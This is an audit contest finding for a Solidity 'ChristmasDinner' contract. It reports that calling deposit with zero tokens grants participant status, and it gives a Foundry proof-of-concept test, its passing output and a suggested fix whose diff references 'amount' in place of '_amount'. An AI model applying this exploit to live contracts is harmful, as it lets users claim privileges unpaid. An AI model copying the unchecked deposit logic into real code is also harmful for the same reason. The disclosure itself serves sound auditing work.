Submission Details
Severity:
User Become participant by depoisiting zero amount of token
Vulnerability Details
The deposit function allows a user to become a participant by depositing 0 tokens. This behavior is unintended and could result in:
Manipulation of Participation Status: A user can call the deposit function with a zero amount to gain participant privileges without contributing any tokens.
Impact
Malicious actors can exploit this to gain participant privileges without contributing to the system.
Tools Used
foundry , vs code
POC
function test__ZeroDepositToken() public {
vm.startPrank(user1);
uint256 balanceBefore = wbtc.balanceOf(user1);
console.log("Wbtc Balance Before Deposit: ", balanceBefore);
uint256 UserBalanceInContractBeforeDeposit = cd.balances(user1, address(wbtc));
console.log("User wbtc Balance In Contract Before Deposit: ", UserBalanceInContractBeforeDeposit);
cd.deposit(address(wbtc), 0);
uint256 balanceAfter = wbtc.balanceOf(user1);
uint256 UserBalanceInContractAfterDeposit = cd.balances(user1, address(wbtc));
console.log("Wbtc Balance After Deposit: ", balanceAfter);
console.log("User wbtc Balance In Contract After Deposit: ", UserBalanceInContractAfterDeposit);
assert(cd.getParticipationStatus(user1) == true);
console.log("Participation Status: ", cd.getParticipationStatus(user1));
console.log("User Become participant by depoisiting zero amount of token");
vm.stopPrank();
}
parwej@90CXC:/mnt/d/my Docs/2024-12-christmas-dinner$ forge test --mt test__ZeroDepositToken -vvv
[⠔] Compiling...
[⠢] Compiling 1 files with Solc 0.8.28
[⠰] Solc 0.8.28 finished in 610.33ms
Compiler run successful!
Ran 1 test for test/ChristmasDinnerTest.t.sol:ChristmasDinnerTest
[PASS] test__ZeroDepositToken() (gas: 69372)
Logs:
Wbtc Balance Before Deposit: 2000000000000000000
User wbtc Balance In Contract Before Deposit: 0
Wbtc Balance After Deposit: 2000000000000000000
User wbtc Balance In Contract After Deposit: 0
Participation Status: true
User Become participant by depoisiting zero amount of token
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.73ms (6.15ms CPU time)
Ran 1 test suite in 11.99ms (6.73ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
Recommendations
function deposit(address _token, uint256 _amount) external beforeDeadline {
if(!whitelisted[_token]) {
revert NotSupportedToken();
}
+ if(amount < MIN_AMOUNT){
+ revert REQUIRE_MIN_AMOUNT();
+ }
if(participant[msg.sender]){
balances[msg.sender][_token] += _amount;
IERC20(_token).transferFrom(msg.sender, address(this), _amount);
emit GenerousAdditionalContribution(msg.sender, _amount);
} else {
participant[msg.sender] = true;
balances[msg.sender][_token] += _amount;
IERC20(_token).transferFrom(msg.sender, address(this), _amount);
emit NewSignup(msg.sender, _amount, getParticipationStatus(msg.sender));
}
}
Rewards breakdown
nSLOC
129This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.